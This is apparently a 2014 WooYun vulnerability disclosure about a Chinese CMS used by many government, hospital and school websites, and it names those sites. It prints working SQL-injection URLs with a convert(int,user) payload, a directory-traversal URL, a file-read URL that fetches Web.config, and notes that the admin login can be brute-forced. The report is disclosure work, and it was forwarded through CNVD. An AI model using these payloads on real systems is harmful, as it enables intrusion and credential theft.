漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-085721
漏洞标题:某CMS漏洞影响多个政府网站
相关厂商:cncert
漏洞作者: 淡蓝色の忧伤
提交时间:2014-12-08 18:29
修复时间:2015-01-22 18:30
公开时间:2015-01-22 18:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-12: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-01-22: 细节向公众公开
简要描述:
是叫qcms 或者灵动管理系统,我也不知道到底叫什么
详细说明:
http://www.yzsgaj.gov.cn 永州市公安局
http://ll.yzsgaj.gov.cn 永州市公安局
http://www.yzglj.com/ 永州市公路局
http://www.ninyuan.gov.cn/ 宁远县政府
http://www.qy.gov.cn/ 祁阳政府网
http://www.yzsgjj.gov.cn/ 永州市住房公积金管理中心
http://www.dx.gov.cn/ 道县政府
http://sjj.dx.gov.cn/ 道县审计局
http://www.lst.gov.cn 冷水滩区政府
http://www.cnll.gov.cn 零陵
http://jsw.lanshan.gov.cn/ 蓝山县
http://da.yzsgaj.gov.cn 东安县公安局
http://www.lanshan.gov.cn 蓝山县
http://www.axdjw.gov.cn 安西
带个医院
http://www.yzjy.net:8080/
学校
http://xsgygl.xmut.edu.cn 厦门理工
http://www.cdfxds.com/ 四川大学附属实验小学东山学校
经测试部分网站注入1跳转到404页面,
注入2都可以
注入 1
cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303
Pid参数未过滤
永州公路局
http://www.yzglj.com/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303
零陵区政府
http://www.cnll.gov.cn/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303
注入 2
cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=&cType=article&time=1417509887642
Id
好多站都有waf 但是有注入就是有注入
道县为例
http://www.dx.gov.cn/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642
http://www.yzglj.com/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642Id
永州公路局
3.后台fck编辑器,不过test页面删的干干净净。。。
但是还是有一个目录遍历
http://ll.yzsgaj.gov.cn/cmsfile/fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../..%2f
好像目录遍历也不是太危险。。但是下面还有
4.本地文件包含,读取任意文件
Ps:配合目录遍历O(∩_∩)O~
http://ll.yzsgaj.gov.cn/cmsfile/ajaj/readjson.aspx?file=../../Web.config
5.后台可爆破
奇葩的是你验证码不更新(两次验证码一样),那还弄个验证码干嘛?
6.疑似注入/web/Default.aspx
http://www.dx.gov.cn/web/Default.aspx
应该能bypass,虽然我没找对姿势
漏洞证明:
修复方案:
没你们懂。。。。。
版权声明:转载请注明来源 淡蓝色の忧伤@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-12-12 19:34
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
最新状态:
暂无